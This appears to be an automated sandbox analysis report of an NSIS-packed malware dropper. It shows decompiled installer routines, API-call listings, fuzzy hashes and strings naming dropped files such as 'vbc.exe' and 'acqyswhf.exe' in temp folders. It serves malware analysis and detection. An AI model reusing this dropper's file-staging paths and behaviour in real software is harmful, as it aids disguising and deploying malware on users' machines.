                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                              • API String ID: 2803837635-1404970732
                                                                                                                                                                                                              • Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                                                                                                                                                                              • Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                              			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                              				FILETIME* _t49;
                                                                                                                                                                                                              				FILETIME* _t62;
                                                                                                                                                                                                              				void* _t64;
                                                                                                                                                                                                              				signed int _t70;
                                                                                                                                                                                                              				FILETIME* _t71;
                                                                                                                                                                                                              				FILETIME* _t75;
                                                                                                                                                                                                              				signed int _t77;
                                                                                                                                                                                                              				void* _t80;
                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                              				CHAR* _t83;
                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t75 = __ebx;
                                                                                                                                                                                                              				_t82 = E00402BCE(0x31);
                                                                                                                                                                                                              				 *(_t85 - 8) = _t82;
                                                                                                                                                                                                              				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                                                                                                                                              				_t33 = E00405C2D(_t82);
                                                                                                                                                                                                              				_push(_t82);
                                                                                                                                                                                                              				_t83 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla\\acqyswhf.exe C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla\\invbat.p";
                                                                                                                                                                                                              				if(_t33 == 0) {
                                                                                                                                                                                                              					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla")), ??);
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00406228();
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00406503(_t83);
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					__eflags =  *(_t85 + 8) - 3;
                                                                                                                                                                                                              					if( *(_t85 + 8) >= 3) {
                                                                                                                                                                                                              						_t64 = E0040659C(_t83);
                                                                                                                                                                                                              						_t77 = 0;
                                                                                                                                                                                                              						__eflags = _t64 - _t75;
                                                                                                                                                                                                              						if(_t64 != _t75) {
                                                                                                                                                                                                              							_t71 = _t64 + 0x14;
                                                                                                                                                                                                              							__eflags = _t71;
                                                                                                                                                                                                              							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						asm("sbb eax, eax");
                                                                                                                                                                                                              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                                                                                                                                              						__eflags = _t70;
                                                                                                                                                                                                              						 *(_t85 + 8) = _t70;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                                                              					if( *(_t85 + 8) == _t75) {
                                                                                                                                                                                                              						E00405D9C(_t83);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags =  *(_t85 + 8) - 1;
                                                                                                                                                                                                              					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                                                                                                                                              					__eflags = _t41 - 0xffffffff;
                                                                                                                                                                                                              					 *(_t85 - 0xc) = _t41;
                                                                                                                                                                                                              					if(_t41 != 0xffffffff) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags =  *(_t85 + 8) - _t75;
                                                                                                                                                                                                              					if( *(_t85 + 8) != _t75) {
                                                                                                                                                                                                              						E0040534F(0xffffffe2,  *(_t85 - 8));
                                                                                                                                                                                                              						__eflags =  *(_t85 + 8) - 2;
                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                              							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                              						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
                                                                                                                                                                                                              						__eflags =  *0x4247e8;
                                                                                                                                                                                                              						goto L32;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						E00406228(0x40ac20, 0x425000);
                                                                                                                                                                                                              						E00406228(0x425000, _t83);
                                                                                                                                                                                                              						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\Albus\AppData\Local\Temp\Nla",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                                                                                                                                              						E00406228(0x425000, 0x40ac20);
                                                                                                                                                                                                              						_t62 = E00405944("C:\Users\Albus\AppData\Local\Temp\Nla",  *(_t85 - 0x28) >> 3) - 4;
                                                                                                                                                                                                              						__eflags = _t62;
                                                                                                                                                                                                              						if(_t62 == 0) {
                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							__eflags = _t62 == 1;
                                                                                                                                                                                                              							if(_t62 == 1) {
                                                                                                                                                                                                              								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                              								_t49 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push(_t83);
                                                                                                                                                                                                              								_push(0xfffffffa);
                                                                                                                                                                                                              								E0040534F();
                                                                                                                                                                                                              								L29:
                                                                                                                                                                                                              								_t49 = 0x7fffffff;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                              					return _t49;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E0040534F(0xffffffea,  *(_t85 - 8));
                                                                                                                                                                                                              				 *0x424814 =  *0x424814 + 1;
                                                                                                                                                                                                              				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                                                                                                                                              				 *0x424814 =  *0x424814 - 1;
                                                                                                                                                                                                              				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                                                                                                                                              				_t80 = _t43;
                                                                                                                                                                                                              				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                                                                                                                                              					L22:
                                                                                                                                                                                                              					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				CloseHandle( *(_t85 - 0xc)); // executed
                                                                                                                                                                                                              				__eflags = _t80 - _t75;
                                                                                                                                                                                                              				if(_t80 >= _t75) {
                                                                                                                                                                                                              					goto L31;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					__eflags = _t80 - 0xfffffffe;
                                                                                                                                                                                                              					if(_t80 != 0xfffffffe) {
                                                                                                                                                                                                              						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                                                                                                                                                                              						lstrcatA(_t83,  *(_t85 - 8));
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(0x200010);
                                                                                                                                                                                                              					_push(_t83);
                                                                                                                                                                                                              					E00405944();
                                                                                                                                                                                                              					goto L29;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				goto L33;
                                                                                                                                                                                                              			}

















                                                                                                                                                                                                              0x00401759
                                                                                                                                                                                                              0x00401760
                                                                                                                                                                                                              0x00401769
                                                                                                                                                                                                              0x0040176c
                                                                                                                                                                                                              0x0040176f
                                                                                                                                                                                                              0x00401774
                                                                                                                                                                                                              0x00401775
                                                                                                                                                                                                              0x0040177c
                                                                                                                                                                                                              0x00401798
                                                                                                                                                                                                              0x0040177e
                                                                                                                                                                                                              0x0040177f
                                                                                                                                                                                                              0x0040177f
                                                                                                                                                                                                              0x0040179e
                                                                                                                                                                                                              0x004017a8
                                                                                                                                                                                                              0x004017a8
                                                                                                                                                                                                              0x004017ac
                                                                                                                                                                                                              0x004017af
                                                                                                                                                                                                              0x004017b4
                                                                                                                                                                                                              0x004017b6
                                                                                                                                                                                                              0x004017b8
                                                                                                                                                                                                              0x004017bd
                                                                                                                                                                                                              0x004017bd
                                                                                                                                                                                                              0x004017c8
                                                                                                                                                                                                              0x004017c8
                                                                                                                                                                                                              0x004017d9
                                                                                                                                                                                                              0x004017db
                                                                                                                                                                                                              0x004017db
                                                                                                                                                                                                              0x004017dc
                                                                                                                                                                                                              0x004017dc
                                                                                                                                                                                                              0x004017df
                                                                                                                                                                                                              0x004017e2
                                                                                                                                                                                                              0x004017e5
                                                                                                                                                                                                              0x004017e5
                                                                                                                                                                                                              0x004017ec
                                                                                                                                                                                                              0x004017fb
                                                                                                                                                                                                              0x00401800
                                                                                                                                                                                                              0x00401803
                                                                                                                                                                                                              0x00401806
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401808
                                                                                                                                                                                                              0x0040180b
                                                                                                                                                                                                              0x00401865
                                                                                                                                                                                                              0x0040186a
                                                                                                                                                                                                              0x004015b0
                                                                                                                                                                                                              0x004027bf
                                                                                                                                                                                                              0x004027bf
                                                                                                                                                                                                              0x00402a5a
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040180d
                                                                                                                                                                                                              0x00401813
                                                                                                                                                                                                              0x0040181e
                                                                                                                                                                                                              0x0040182b
                                                                                                                                                                                                              0x00401836
                                                                                                                                                                                                              0x0040184c
                                                                                                                                                                                                              0x0040184c
                                                                                                                                                                                                              0x0040184f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00401855
                                                                                                                                                                                                              0x00401855
                                                                                                                                                                                                              0x00401856
                                                                                                                                                                                                              0x00401873
                                                                                                                                                                                                              0x00402a63
                                                                                                                                                                                                              0x00402a63
                                                                                                                                                                                                              0x00402a63
                                                                                                                                                                                                              0x00401858
                                                                                                                                                                                                              0x00401858
                                                                                                                                                                                                              0x00401859
                                                                                                                                                                                                              0x00401492
                                                                                                                                                                                                              0x00402387
                                                                                                                                                                                                              0x00402387
                                                                                                                                                                                                              0x00402387
                                                                                                                                                                                                              0x00401856
                                                                                                                                                                                                              0x0040184f
                                                                                                                                                                                                              0x00402a65
                                                                                                                                                                                                              0x00402a69
                                                                                                                                                                                                              0x00402a69
                                                                                                                                                                                                              0x00401883
                                                                                                                                                                                                              0x00401888
                                                                                                                                                                                                              0x00401896
                                                                                                                                                                                                              0x0040189b
                                                                                                                                                                                                              0x004018a1
                                                                                                                                                                                                              0x004018a5
                                                                                                                                                                                                              0x004018a7
                                                                                                                                                                                                              0x004018af
                                                                                                                                                                                                              0x004018bb
                                                                                                                                                                                                              0x004018a9
                                                                                                                                                                                                              0x004018a9
                                                                                                                                                                                                              0x004018ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004018ad
                                                                                                                                                                                                              0x004018c4
                                                                                                                                                                                                              0x004018ca
                                                                                                                                                                                                              0x004018cc
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004018d2
                                                                                                                                                                                                              0x004018d2
                                                                                                                                                                                                              0x004018d5
                                                                                                                                                                                                              0x004018ed
                                                                                                                                                                                                              0x004018d7
                                                                                                                                                                                                              0x004018da
                                                                                                                                                                                                              0x004018e3
                                                                                                                                                                                                              0x004018e3
                                                                                                                                                                                                              0x004018f2
                                                                                                                                                                                                              0x004018f7
                                                                                                                                                                                                              0x00402382
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00402382
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000000,00000000,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                                                • Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                                                                                                                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Nla$C:\Users\user\AppData\Local\Temp\Nla$C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
                                                                                                                                                                                                              • API String ID: 1941528284-126313373
                                                                                                                                                                                                              • Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                                                                                                                                                                              • Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004065C3(intOrPtr _a4) {
                                                                                                                                                                                                              				char _v292;
                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                              				struct HINSTANCE__* _t14;
                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                                                                                                              				if(_t10 > 0x104) {
                                                                                                                                                                                                              					_t10 = 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                                                                                                              					_t16 = 1;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                                                                                                                                              				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                                                                                                              				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x004065da
                                                                                                                                                                                                              0x004065e3
                                                                                                                                                                                                              0x004065e5
                                                                                                                                                                                                              0x004065e5
                                                                                                                                                                                                              0x004065e9
                                                                                                                                                                                                              0x004065fb
                                                                                                                                                                                                              0x004065f5
                                                                                                                                                                                                              0x004065f5
                                                                                                                                                                                                              0x004065f5
                                                                                                                                                                                                              0x004065ff
                                                                                                                                                                                                              0x00406613
                                                                                                                                                                                                              0x00406627
                                                                                                                                                                                                              0x0040662e

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00406613
                                                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                                                                                              • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                              • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                                                                                              				char _t11;
                                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                              				CHAR* _t21;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t21 = _a4;
                                                                                                                                                                                                              				_t20 = 0x64;
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t11 =  *0x40a3ec; // 0x61736e
                                                                                                                                                                                                              					_t20 = _t20 - 1;
                                                                                                                                                                                                              					_a4 = _t11;
                                                                                                                                                                                                              					_t12 = GetTickCount();
                                                                                                                                                                                                              					_t17 = 0x1a;
                                                                                                                                                                                                              					_a6 = _a6 + _t12 % _t17;
                                                                                                                                                                                                              					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                                                                                                              					if(_t15 != 0) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                                                                                                              					return _t15;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t21;
                                                                                                                                                                                                              			}









                                                                                                                                                                                                              0x00405df4
                                                                                                                                                                                                              0x00405dfa
                                                                                                                                                                                                              0x00405dfb
                                                                                                                                                                                                              0x00405dfb
                                                                                                                                                                                                              0x00405e00
                                                                                                                                                                                                              0x00405e01
                                                                                                                                                                                                              0x00405e04
                                                                                                                                                                                                              0x00405e0e
                                                                                                                                                                                                              0x00405e1b
                                                                                                                                                                                                              0x00405e1e
                                                                                                                                                                                                              0x00405e26
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e2a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e2c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405e2c
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,0040345F,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405E04
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E1E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                              • API String ID: 1716503409-1498418707
                                                                                                                                                                                                              • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                                                                                                              • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                              			E004015BB(char __ebx, void* __eflags) {
                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                              				int _t19;
                                                                                                                                                                                                              				char _t21;
                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                              				char _t23;
                                                                                                                                                                                                              				signed char _t24;
                                                                                                                                                                                                              				char _t26;
                                                                                                                                                                                                              				CHAR* _t28;
                                                                                                                                                                                                              				char* _t32;
                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t26 = __ebx;
                                                                                                                                                                                                              				_t28 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                              				_t13 = E00405C59(_t28);
                                                                                                                                                                                                              				_t30 = _t13;
                                                                                                                                                                                                              				if(_t13 != __ebx) {
                                                                                                                                                                                                              					do {
                                                                                                                                                                                                              						_t32 = E00405BEB(_t30, 0x5c);
                                                                                                                                                                                                              						_t21 =  *_t32;
                                                                                                                                                                                                              						 *_t32 = _t26;
                                                                                                                                                                                                              						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                                                                                                              						if(_t21 != _t26) {
                                                                                                                                                                                                              							L5:
                                                                                                                                                                                                              							_t22 = E00405892(_t28);
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                                                                                                                                              							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t22 = E00405815(_t28);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t22 != _t26) {
                                                                                                                                                                                                              							if(_t22 != 0xb7) {
                                                                                                                                                                                                              								L9:
                                                                                                                                                                                                              								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                                                                                                              								if((_t24 & 0x00000010) == 0) {
                                                                                                                                                                                                              									goto L9;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                                                                                                              						 *_t32 = _t23;
                                                                                                                                                                                                              						_t30 = _t32 + 1;
                                                                                                                                                                                                              					} while (_t23 != _t26);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                                                                                                                                              					_push(0xfffffff5);
                                                                                                                                                                                                              					E00401423();
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					E00401423(0xffffffe6);
                                                                                                                                                                                                              					E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp\\Nla", _t28);
                                                                                                                                                                                                              					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                                                                                                              					if(_t19 == 0) {
                                                                                                                                                                                                              						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}













                                                                                                                                                                                                              0x004015bb
                                                                                                                                                                                                              0x004015c2
                                                                                                                                                                                                              0x004015c5
                                                                                                                                                                                                              0x004015ca
                                                                                                                                                                                                              0x004015ce
                                                                                                                                                                                                              0x004015d0
                                                                                                                                                                                                              0x004015d8
                                                                                                                                                                                                              0x004015da
                                                                                                                                                                                                              0x004015dc
                                                                                                                                                                                                              0x004015e0
                                                                                                                                                                                                              0x004015e3
                                                                                                                                                                                                              0x004015fb
